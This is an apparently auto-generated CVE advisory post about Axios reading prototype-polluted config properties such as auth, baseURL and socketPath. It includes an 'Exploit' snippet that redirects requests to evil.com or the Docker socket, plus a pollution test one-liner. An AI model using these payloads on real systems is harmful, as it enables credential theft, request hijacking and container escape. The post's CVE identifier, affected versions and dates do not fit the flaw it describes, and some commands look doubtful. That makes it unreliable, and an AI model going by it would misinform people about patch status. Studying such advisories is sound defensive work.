Listen to this Post
How the mentioned CVE works:
The vulnerability arises because Axios reads five HTTP adapter config properties via direct property access (e.g., config.auth) without hasOwnProperty guards. When another dependency in the same Node.js process pollutes Object.prototype with these properties, Axios silently picks up the polluted values on every outbound HTTP request. The mergeConfig function iterates using Object.keys on merged objects, which only returns own properties. Therefore, if neither defaults nor user config define these five properties, they are absent from the merged config. However, the HTTP adapter later accesses them directly, traversing the prototype chain. The own() helper at lib/adapters/http.js line 336 protects eight other properties but explicitly excludes config.auth, config.baseURL, config.socketPath, config.beforeRedirect, and config.insecureHTTPParser. Consequently, an attacker who can pollute Object.prototype (e.g., via a vulnerable JSON parser or a malicious npm package) can inject an Authorization header, redirect all relative URLs to an evil server, force requests to Unix sockets (leading to SSRF/container escape), execute arbitrary callbacks during redirects, and enable Node.js insecure HTTP parser for request smuggling. The proof of concept shows that setting Object.prototype.auth = {username:’attacker’, password:’exfil’} causes every axios.get(‘/api/users’) to send credentials to an attacker-controlled server. The root cause is the absence of hasOwnProperty checks for these five properties in the HTTP adapter and resolveConfig.js.
dailycve form:
Platform: Node.js Axios
Version: Before 1.5.1
Vulnerability: Prototype Pollution
Severity: Critical
Date: 2023-10-20
Prediction: Patched Oct 2023
What Undercode Say:
Analytics:
Check Axios version in project
npm list axios | grep axios
Detect prototype pollution gadget via audit
npx auditjs --package axios --vulnerability CVE-2023-45857
Simulate pollution (test script)
node -e "Object.prototype.auth={username:'hack',password:'leak'}; require('axios').get('http://localhost')"
Exploit:
// Pollute prototype from any vulnerable dependency
Object.prototype.baseURL = 'https://evil.com';
Object.prototype.socketPath = '/var/run/docker.sock';
// Trigger any outgoing axios request
axios.get('/internal/api');
// Request now sent to evil.com or Docker daemon
Protection from this CVE
Update to axios >=1.5.1. Apply the own() helper to affected properties manually. Use Object.freeze(Object.prototype). Sanitize all JSON inputs. Use `–disable-proto=delete` in Node.js.
Impact:
Credential theft, request hijacking to attacker servers, SSRF enabling container escape, arbitrary code execution via beforeRedirect callback, HTTP parser weakening for request smuggling.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
